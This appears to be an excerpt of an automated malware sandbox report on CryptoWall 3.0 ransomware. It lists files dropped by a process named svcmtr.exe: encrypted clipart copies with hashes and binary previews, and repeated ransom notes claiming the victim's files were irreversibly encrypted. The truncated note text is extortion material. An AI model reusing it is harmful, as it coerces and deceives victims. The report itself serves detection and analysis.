                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42478
                                                                                                                          Entropy (8bit):7.995839147716423
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GS3TTgqjmW+fTKokEWzdqpkFKeM56jIgqxHNGSW3e7+ElT3RVdb7JwR:B3fHmvrH3sq2swMb+9e+ElTB/FO
                                                                                                                          MD5:FBA4261E90510B5D3B48FF2997477F60
                                                                                                                          SHA1:AECB9F4F864F0E2F07DBFE78206317D3842EF3B7
                                                                                                                          SHA-256:7167EA340484A0E011BB2AB27FA4B19D4BAEC9583D861D6B64D4C115359B2DB1
                                                                                                                          SHA-512:F9D6F79C10FFCB29BE7CDDDD7337A240884B4036D6FF05AC1CB1B7E6813371BE31E4DDAF4B192AA648F330627D7EFEB5A911DD88DBF3E14AE637CC15F6DFC059
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264........t...\w....E....-........:..Q.@...Vlb.../..........v.d.S.X..QYF...g...]*^.#vF........0.{.y*.b!i{N.k}ts4.....j..N..8.D.....q+.....[...sSk.c...;..^...=.....m'l.O.v`............_P|.t6&.a..>...B.#.4.~}..8/...{.....t.5as..VAp~{.DLx.whl..W......c..c.$c"..idX.]!....z.A{...x.....u......v...t.&e.1g.p.A.....> P.{...`.{t.z..m.)*.u..3ry.....ip.......{.%w..I....2.........C.'#..5h......,..u_.C........ ..qaV.]1h,.D.mQi.I.8..M_h.7_ S=..,K..0..0..{.a..........&.yr..D...?...}.O>.6....y.s...=e..).Xl.....h...,.$8'......@$.Q......@g#.0.....I.Lvida..E.K.m...`.M.U.O...-Z]..]HM....y

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11598
                                                                                                                          Entropy (8bit):7.975732237540304
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gou3d3Chz/Sp1QHL08Lnamj4Jz0Nr/X7Bksqn/gUfgc03azudGo5g65U4s:GzCQwHL0kUBAr7JOF0qQ5o
                                                                                                                          MD5:C690620335A60C48016F5C5ACA89FCDD
                                                                                                                          SHA1:FC04A2081A9BD48EF9A36B856CF2E2E36B3B193E
                                                                                                                          SHA-256:B27B8F986FB0CD161FD054AF9D77ED5C596739B662E08C1C4EAD55B75B3F8999
                                                                                                                          SHA-512:24EEB7F506E2F744E9C1EE43D88247141787369F3D0C8A6F6C63C37B48AEDC1D6B8900130727914A8B01E0C6C2831BEB46E585162E7669239FF37AD4CCDEC2B9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...q\g.....<.....7.+...C..Fy.w.G..x.YTx....D.....5.'M..../..&..N..eet.....W.. .6.."...\....G.o..^Ez.J.&.....m./.N\R0.2......^.H..z2...0.C+...}....1..,FE.~S.h..A.m.q..%....b.'.....u..........x.}....R[........yU...~...(s..A....E../y|.T...]e..Gg..R)......'5.......V.M.s........M..P.F3.&...L6{9j^.....g..y@'e.i.?\.Y....a.]....o0.O.;..4.t.&X.."Q...l.......3^..kw..3y)..LN.. .?...C>....d..d..>.^..$.4.A.U.&>.....U..il.*.:..A.T.a.@p.Dt..On?...H.....0.N.Z..',Gw..dn1=QID..._......u.8Or.|s..d.. ......)."....k.S....'.s.p...p j!_i.#lt..]."...4....hwJn.C.W.s.G.#......>........).uZe.....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11598
                                                                                                                          Entropy (8bit):7.975732237540304
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gou3d3Chz/Sp1QHL08Lnamj4Jz0Nr/X7Bksqn/gUfgc03azudGo5g65U4s:GzCQwHL0kUBAr7JOF0qQ5o
                                                                                                                          MD5:C690620335A60C48016F5C5ACA89FCDD
                                                                                                                          SHA1:FC04A2081A9BD48EF9A36B856CF2E2E36B3B193E
                                                                                                                          SHA-256:B27B8F986FB0CD161FD054AF9D77ED5C596739B662E08C1C4EAD55B75B3F8999
                                                                                                                          SHA-512:24EEB7F506E2F744E9C1EE43D88247141787369F3D0C8A6F6C63C37B48AEDC1D6B8900130727914A8B01E0C6C2831BEB46E585162E7669239FF37AD4CCDEC2B9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...q\g.....<.....7.+...C..Fy.w.G..x.YTx....D.....5.'M..../..&..N..eet.....W.. .6.."...\....G.o..^Ez.J.&.....m./.N\R0.2......^.H..z2...0.C+...}....1..,FE.~S.h..A.m.q..%....b.'.....u..........x.}....R[........yU...~...(s..A....E../y|.T...]e..Gg..R)......'5.......V.M.s........M..P.F3.&...L6{9j^.....g..y@'e.i.?\.Y....a.]....o0.O.;..4.t.&X.."Q...l.......3^..kw..3y)..LN.. .?...C>....d..d..>.^..$.4.A.U.&>.....U..il.*.:..A.T.a.@p.Dt..On?...H.....0.N.Z..',Gw..dn1=QID..._......u.8Or.|s..d.. ......)."....k.S....'.s.p...p j!_i.#lt..]."...4....hwJn.C.W.s.G.#......>........).uZe.....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13246
                                                                                                                          Entropy (8bit):7.98130112234063
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GogS5jrU8FoVstrngO7An081AakP58rFHEEd5WqQJHHmYZ0DoPtLI:GbSJJkgS081JFk2AvJHGYZ08PtE
                                                                                                                          MD5:F0A6DF2161BC61D8E1973163D67F6138
                                                                                                                          SHA1:2F945624EF6B4769F5A84083931AE9E7CBE81292
                                                                                                                          SHA-256:633F5F1E96EC3BA044C48557C6F220998CE136F3C29FD5ACA53298888E0E477C
                                                                                                                          SHA-512:A2327BCF03111F4FDD811FC89C1E6ABADAD26ADDF2FBC7612CF2209FF0D0B1EA35EF2872440DD23C85407FFE0C30F1DCACC8F8EB9320E59750BFA2C7CEE1E66F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...*...JLws........2..9oFqZ.Bb....! ..i.P.<.&..cd...h.2.':.a.....|.@E."...B....`l.....z..6.#....}}.7....e.`..B..ap....*D..f...'Z.N.>2Xn..~...~..7g..xq4_.Q.%T%....f..#y..+c3.il.>....} .0...8..+8.o.>E3.r.....9....t9..ke..^$.....R.U..5...[u8.Y>..R.wh.....p..![.x..jMM+l.6FU.\./..}W!...P9t.#.(.....p.....n.C&c.........\..{.mk.qK..t....E9X..m..bb..Y].R."4!.. .....a2.-.....6P.q.5o2..`..+...(.~.h.A...y..&LS...R..P.G...p..{:5....Q......5..m....Gt.!...d.f.z...}..}K)`j;.......$....%M..A]..5g.=/.........8..R...[.^...p?.....t....^......Zy...>..d".&.c..za.]S.-.`.2].....BZ..... .%.<..9.e....p

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13246
                                                                                                                          Entropy (8bit):7.98130112234063
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GogS5jrU8FoVstrngO7An081AakP58rFHEEd5WqQJHHmYZ0DoPtLI:GbSJJkgS081JFk2AvJHGYZ08PtE
                                                                                                                          MD5:F0A6DF2161BC61D8E1973163D67F6138
                                                                                                                          SHA1:2F945624EF6B4769F5A84083931AE9E7CBE81292
                                                                                                                          SHA-256:633F5F1E96EC3BA044C48557C6F220998CE136F3C29FD5ACA53298888E0E477C
                                                                                                                          SHA-512:A2327BCF03111F4FDD811FC89C1E6ABADAD26ADDF2FBC7612CF2209FF0D0B1EA35EF2872440DD23C85407FFE0C30F1DCACC8F8EB9320E59750BFA2C7CEE1E66F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...*...JLws........2..9oFqZ.Bb....! ..i.P.<.&..cd...h.2.':.a.....|.@E."...B....`l.....z..6.#....}}.7....e.`..B..ap....*D..f...'Z.N.>2Xn..~...~..7g..xq4_.Q.%T%....f..#y..+c3.il.>....} .0...8..+8.o.>E3.r.....9....t9..ke..^$.....R.U..5...[u8.Y>..R.wh.....p..![.x..jMM+l.6FU.\./..}W!...P9t.#.(.....p.....n.C&c.........\..{.mk.qK..t....E9X..m..bb..Y].R."4!.. .....a2.-.....6P.q.5o2..`..+...(.~.h.A...y..&LS...R..P.G...p..{:5....Q......5..m....Gt.!...d.f.z...}..}K)`j;.......$....%M..A]..5g.=/.........8..R...[.^...p?.....t....^......Zy...>..d".&.c..za.]S.-.`.2].....BZ..... .%.<..9.e....p

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):48974
                                                                                                                          Entropy (8bit):7.996378602046359
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GHiHTfSzHkCEw1/XjKvCAUF1X6MTyCUb9ijKM4mHSPKGR9vYzgeV4AikvMT5jv6t:7qzHkCj1mF6X7yCUb9ijKzmHSiiYzg4P
                                                                                                                          MD5:D39F8A1B4BD092092A903B544D70C0A7
                                                                                                                          SHA1:74FB03F9E035AD684BC972DD5BED3188CF231ACE
                                                                                                                          SHA-256:17CACC610A3172509956AE30AA3AE8F5E682DB04FCBEA2F06CE07672019AAF26
                                                                                                                          SHA-512:EA17DE62A98DF1D6ECD29BA63615263BDC6EDCB06DD4DB22673B2A408433EB836B5D7AD227842DED04003D660710EF74B55FF8A1E09159ED7C080C3B607972BE
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...p.X..S6....J..4....f..o.G..\.#|..0k......3kJ.. ...m..WsY.....F...9o..u..{K.Wk..q.^2sx.Q.#B-..~./z...^..v:.........}&.Y).S....h!81..k..o$i....|~*._.(+.mo...^d...kl)_t.>q...f.3.Z5.W4":....]3)hdE...C....?s.....%.Sa#.'.jdN.h....5<o.#.&~{....:...nh...5.._u.[.1Y_bJ.H..?..|.#:..o~ud&..Y@{#OP&f..Vu.K.H..#...e.^.oC..=...?..".U+.h.m...F,..X<..qG.....>L=.A..M%.<..._:.Oq...QE...)...T}fO;...w..]..?.......PB.Vz.D..s.n.3.4..gT.....@....>..0....0....F..s....-...Z6J............%q..7=.....q..7...'v;..j....lZ...Z..k...%.....)C...Z....Ok.r.P.. A...R@i...O...$]|.;...uK.^C...y.tK ..............[

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):48974
                                                                                                                          Entropy (8bit):7.996378602046359
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GHiHTfSzHkCEw1/XjKvCAUF1X6MTyCUb9ijKM4mHSPKGR9vYzgeV4AikvMT5jv6t:7qzHkCj1mF6X7yCUb9ijKzmHSiiYzg4P
                                                                                                                          MD5:D39F8A1B4BD092092A903B544D70C0A7
                                                                                                                          SHA1:74FB03F9E035AD684BC972DD5BED3188CF231ACE
                                                                                                                          SHA-256:17CACC610A3172509956AE30AA3AE8F5E682DB04FCBEA2F06CE07672019AAF26
                                                                                                                          SHA-512:EA17DE62A98DF1D6ECD29BA63615263BDC6EDCB06DD4DB22673B2A408433EB836B5D7AD227842DED04003D660710EF74B55FF8A1E09159ED7C080C3B607972BE
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...p.X..S6....J..4....f..o.G..\.#|..0k......3kJ.. ...m..WsY.....F...9o..u..{K.Wk..q.^2sx.Q.#B-..~./z...^..v:.........}&.Y).S....h!81..k..o$i....|~*._.(+.mo...^d...kl)_t.>q...f.3.Z5.W4":....]3)hdE...C....?s.....%.Sa#.'.jdN.h....5<o.#.&~{....:...nh...5.._u.[.1Y_bJ.H..?..|.#:..o~ud&..Y@{#OP&f..Vu.K.H..#...e.^.oC..=...?..".U+.h.m...F,..X<..qG.....>L=.A..M%.<..._:.Oq...QE...)...T}fO;...w..]..?.......PB.Vz.D..s.n.3.4..gT.....@....>..0....0....F..s....-...Z6J............%q..7=.....q..7...'v;..j....lZ...Z..k...%.....)C...Z....Ok.r.P.. A...R@i...O...$]|.;...uK.^C...y.tK ..............[

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\Publisher\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\Publisher\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

